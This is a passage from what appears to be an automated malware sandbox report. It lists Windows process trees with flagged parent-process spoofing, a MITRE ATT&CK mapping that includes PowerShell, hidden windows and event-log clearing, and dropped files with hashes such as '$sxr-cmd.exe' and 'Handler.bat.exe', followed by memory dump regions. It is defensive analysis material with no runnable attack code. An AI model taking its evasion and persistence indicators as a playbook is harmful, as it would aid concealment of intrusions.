1⤵
PID:3968

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:4004

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4228

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4412

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4388

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:5040

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4820

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:2304

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:916

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:2220

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2152

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3356

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:4496

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Enumerates system info in registry
PID:2744

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:1448
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1788 -ip 1788
  2⤵
  PID:924
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 640 -p 5172 -ip 5172
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:5292
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 600 -p 3140 -ip 3140
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:1180

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Window

T1564.003

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.26a1de1a-702b-4c53-ba3b-e4209748b7bc.tmp.txt

Filesize
13KB

MD5
efdb005de50dcccd0e5a0d9c9cb69eb3

SHA1
b31b96ff9d4a5fbbb98ff972fff5222c1b96c7e0

SHA256
873f276fed49ddb032081564121b5a002c415890b53ddacd183f8bf56bb5ee16

SHA512
813320b292689e172832f3a4cf60597c8501d0abc5d01d3080d4c5cb398dfcb4d2979fee66675f3a8767433646dc8e396483fc07a083add21ff1e58a7da5a21a

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.343706d5-b3a5-4b5a-9558-4aee2662dc89.tmp.csv

Filesize
37KB

MD5
a1943b66516a4160e4a1dfd76bb862fe

SHA1
ded42d5dbf064403aa95e7dbca31927e6e2abcf9

SHA256
fac149a4a9ca62ac11ad9d680cec535f259a18ccf725607cd9057fc96b372053

SHA512
32433e1bfb993dcc22588044edee28270df62b9462caf5abf5963175c656fab4eea211bbe154fdc8e14eecceaad59ab2459d82caeb3445136dd5d0ef72c2d7e9

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.4dc3ac07-b339-43cc-901e-cb521eccfa3a.tmp.csv

Filesize
38KB

MD5
0dfe21816632d1f53f37eb791b02a24e

SHA1
0a1763d0752e0334fee2cd905aa230048e6a5113

SHA256
964e2f3426ab175c933c9149d8fe4302f555d2d346b344ce19a0c53d6867bd1d

SHA512
decdb66522217c5ca36fa6faceeb995df7ad056f4d409401cbb1cf38efc4ee0755162c2b7e884a64f9fa61d73638d77ed9021ca234b55bf061ae28e5db91555f

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.9ff30b4f-331b-4e0b-b799-a69fe5191378.tmp.txt

Filesize
13KB

MD5
bb127983170b4affbd37e7c7c1d58f74

SHA1
28cd2c40bedbad606c1c27e36194c655eaca71e0

SHA256
abc080af4d4156467aea3f74cbb8f0a2f32d45ff26973fcf8974555d714e92e2

SHA512
73af4e872963c0e8c3cf906af707371e8a6c6ffa8fa79f182e1b5958b3ba5b019276dee629d511ea6d3430b18675ec17bf5a59c899490a12c46f9a0e840cf98c

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.d36101a0-8bbc-4f58-9376-e66b1e9d058e.tmp.txt

Filesize
13KB

MD5
19dd5bf5f040cd8938d4906de40fc6b4

SHA1
6897482ae7731de937b323da5fb470722fa7df98

SHA256
ef42103f97d449551d0b0b2b0ec157e6dea6a9f42117699cbf43fa6f3f99e7e6

SHA512
f1b23f9cbdcb89ea12ecef4f40990a6c48ba7f0a330fa784f56c02db9fe5e89310ccad5f3cde2ea332fbd4359e3beb910b64c79bd5b7d452002be3cf6019a070

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.ff54c4ef-f9ba-4dcf-831f-aed520c76a2f.tmp.csv

Filesize
38KB

MD5
2b4730b3193d16fb35ce5333c41054b0

SHA1
c8797e421c6baa8347007d495c8dd45fe722672a

SHA256
0b628a9b5530e085441ae850b04b11402a48926f6552c771d0c3eeb1a273c0ae

SHA512
daa5bbe52eb182c0c773cdada347084ef90065d672edf87ce730c6c52f1f414e02b3a4d24537fbe3f0c5b78a9f8b25f841135704af0dd1aaa4feb939d9d27a84

Download Submit
C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe

Filesize
440KB

MD5
0e9ccd796e251916133392539572a374

SHA1
eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

SHA256
c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

SHA512
e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bqhyqas2.ynr.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\$sxr-cmd.exe

Filesize
324KB

MD5
c5db7b712f280c3ae4f731ad7d5ea171

SHA1
e8717ff0d40e01fd3b06de2aa5a401bed1c907cc

SHA256
f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba

SHA512
bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89

Download Submit
C:\Windows\$sxr-mshta.exe

Filesize
32KB

MD5
356e04e106f6987a19938df67dea0b76

SHA1
f2fd7cde5f97427e497dfb07b7f682149dc896fb

SHA256
4ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e

SHA512
df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd

Download Submit
memory/420-139-0x00007FF8B4A70000-0x00007FF8B4A80000-memory.dmp

Filesize
64KB

Download
memory/420-138-0x000002B9B30C0000-0x000002B9B30E7000-memory.dmp

Filesize
156KB

Download
memory/424-134-0x0000024D61C90000-0x0000024D61CB7000-memory.dmp

Filesize
156KB

Download
memory/424-135-0x00007FF8B4A70000-0x00007FF8B4A80000-memory.dmp

Filesize
64KB

Download
memory/468-125-0x00007FF8B4A70000-0x00007FF8B4A80000-memory.dmp

Filesize
64KB

Download
memory/468-123-0x000001D500590000-0x000001D5005B7000-memory.dmp

Filesize
156KB

Download
memory/640-117-0x0000028CDD800000-0x0000028CDD822000-memory.dmp

Filesize
136KB

Download
memory/640-119-0x0000028CDD830000-0x0000028CDD857000-memory.dmp

Filesize
156KB

Download
memory/640-124-0x00007FF8B4A70000-0x00007FF8B4A80000-memory.dmp

Filesize
64KB

Download
memory/692-121-0x00000149E4CE0000-0x00000149E4D07000-memory.dmp

Filesize
156KB

Download
memory/692-128-0x00007FF8B4A70000-0x00007FF8B4A80000-memory.dmp

Filesize
64KB

Download
memory/996-130-0x0000012C24260000-0x0000012C24287000-memory.dmp

Filesize
156KB

Download
memory/996-131-0x00007FF8B4A70000-0x00007FF8B4A80000-memory.dmp

Filesize
64KB

Download
memory/1096-149-0x00007FF8B4A70000-0x00007FF8B4A80000-memory.dmp

Filesize
64KB

Download
memory/1096-148-0x000002906EE60000-0x000002906EE87000-memory.dmp

Filesize
156KB

Download
memory/1120-151-0x000001EFAA6F0000-0x000001EFAA717000-memory.dmp

Filesize
156KB

Download
memory/1656-6-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp

Filesize
10.8MB

Download
memory/1656-5-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp

Filesize
10.8MB

Download
memory/1656-1-0x000001F0D2ED0000-0x000001F0D308E000-memory.dmp

Filesize
1.7MB

Download
memory/1656-34-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp

Filesize
10.8MB

Download
memory/1656-0-0x00007FF8E4EC3000-0x00007FF8E4EC5000-memory.dmp

Filesize
8KB

Download
memory/1656-3-0x000001F0EE780000-0x000001F0EE860000-memory.dmp

Filesize
896KB

Download
memory/1656-4-0x000001F0EEA40000-0x000001F0EEBE6000-memory.dmp

Filesize
1.6MB

Download
memory/1656-2-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp

Filesize
10.8MB

Download
memory/1656-32-0x00007FF8E4EC3000-0x00007FF8E4EC5000-memory.dmp

Filesize
8KB

Download
memory/1656-33-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp

Filesize
10.8MB

Download
memory/1980-51-0x0000000140000000-0x0000000140004000-memory.dmp

Filesize
16KB

Download
memory/1980-50-0x0000000140000000-0x0000000140004000-memory.dmp

Filesize
16KB

Download
memory/2600-110-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/2600-112-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/2600-109-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/2600-114-0x0000000001730000-0x000000000174A000-memory.dmp

Filesize
104KB

Download
memory/2700-53-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/2700-52-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/3112-15-0x000001E9C6DF0000-0x000001E9C6E12000-memory.dmp

Filesize
136KB

Download
memory/3112-35-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp

Filesize
10.8MB

Download
memory/3112-16-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp

Filesize
10.8MB

Download
memory/3112-17-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp

Filesize
10.8MB

Download
memory/3112-18-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp

Filesize
10.8MB

Download
memory/3112-19-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp

Filesize
10.8MB

Download
memory/3112-40-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp

Filesize
10.8MB

Download
memory/3112-37-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp

Filesize
10.8MB

Download
memory/3140-79-0x000001B279F30000-0x000001B27A36E000-memory.dmp

Filesize
4.2MB

Download
memory/3140-78-0x000001B279760000-0x000001B279F2A000-memory.dmp

Filesize
7.8MB

Download
memory/3140-75-0x00007FF8F49E0000-0x00007FF8F4BE9000-memory.dmp

Filesize
2.0MB

Download
memory/3140-76-0x00007FF8F3790000-0x00007FF8F384D000-memory.dmp

Filesize
756KB

Download
memory/3140-77-0x000001B278DE0000-0x000001B279364000-memory.dmp

Filesize
5.5MB

Download
memory/3140-102-0x00007FF8F49E0000-0x00007FF8F4BE9000-memory.dmp

Filesize
2.0MB

Download
memory/3140-104-0x000001B27BB30000-0x000001B27BB66000-memory.dmp

Filesize
216KB

Download
memory/3140-103-0x00007FF8F3790000-0x00007FF8F384D000-memory.dmp

Filesize
756KB

Download
memory/3140-101-0x000001B27BA50000-0x000001B27BA9E000-memory.dmp

Filesize
312KB

Download
memory/3140-100-0x000001B27BAF0000-0x000001B27BB2C000-memory.dmp

Filesize
240KB

Download
memory/3140-91-0x000001B27BE40000-0x000001B27C002000-memory.dmp

Filesize
1.8MB

Download
memory/3140-90-0x000001B27BBB0000-0x000001B27BC62000-memory.dmp

Filesize
712KB

Download
memory/3140-89-0x000001B27BAA0000-0x000001B27BAF0000-memory.dmp

Filesize
320KB

Download
memory/3140-81-0x00007FF8F49E0000-0x00007FF8F4BE9000-memory.dmp

Filesize
2.0MB

Download
memory/3140-80-0x000001B27A370000-0x000001B27A422000-memory.dmp

Filesize
712KB

Download
memory/4644-45-0x000001F180EA0000-0x000001F180EF8000-memory.dmp

Filesize
352KB

Download
memory/4644-43-0x000001F180D90000-0x000001F180E36000-memory.dmp

Filesize
664KB

Download
memory/4644-36-0x000001F180000000-0x000001F180024000-memory.dmp

Filesize
144KB

Download
memory/4644-39-0x00007FF8F3790000-0x00007FF8F384D000-memory.dmp

Filesize
756KB

Download
memory/4644-47-0x00007FF8F49E0000-0x00007FF8F4BE9000-memory.dmp

Filesize
2.0MB

Download
memory/4644-49-0x000001F180FE0000-0x000001F180FEA000-memory.dmp

Filesize
40KB

Download
memory/4644-38-0x00007FF8F49E0000-0x00007FF8F4BE9000-memory.dmp

Filesize
2.0MB

Download
memory/4644-41-0x000001F180330000-0x000001F180D80000-memory.dmp

Filesize
10.3MB

Download
memory/4644-46-0x000001F180F00000-0x000001F180F22000-memory.dmp

Filesize
136KB

Download
memory/4644-44-0x000001F180E40000-0x000001F180E96000-memory.dmp

Filesize
344KB

Download
memory/4716-108-0x00007FF8F3790000-0x00007FF8F384D000-memory.dmp

Filesize
756KB

Download
memory/4716-115-0x0000000140000000-0x0000000140028000-memory.dmp

Filesize
160KB

Download
memory/4716-105-0x0000000140000000-0x0000000140028000-memory.dmp

Filesize
160KB

Download
memory/4716-107-0x00007FF8F49E0000-0x00007FF8F4BE9000-memory.dmp

Filesize
2.0MB

Download
memory/4716-106-0x0000000140000000-0x0000000140028000-memory.dmp

Filesize
160KB

Download